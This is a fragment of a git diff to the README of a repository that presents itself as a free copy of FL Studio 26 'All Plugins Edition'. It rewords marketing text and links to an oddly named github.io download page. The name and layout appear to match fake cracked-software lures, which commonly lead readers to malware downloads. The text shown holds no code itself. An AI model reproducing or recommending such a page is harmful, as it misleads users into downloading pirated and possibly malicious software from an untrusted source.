benpetrov-io93a7/FL-Studio-26-Free/README.md

   <a href="#install-guide"><img src="https://img.shields.io/badge/📖_Install_Guide-0078D6" alt="Install Guide"/></a>
 </div>

-**Version 26.1.3.5570 – All Plugins Edition** (also referred to as **FL Studio 26** or **FL Studio 2026**) brings performance enhancements, an improved browser, fresh themes, and a smoother workflow to the already powerful environment.
+**Version 26.1.3.5570 – All Plugins Edition** delivers performance optimizations, an improved browser, refreshed themes, and a smoother workflow.
+This release is widely known as FL Studio 2026 (or FL Studio 26) and continues the tradition of lifetime free updates – once purchased, you get all future versions at no extra cost.

 <div align="center">
   <a href="https://analogkreshout.github.io/swxpquzv/">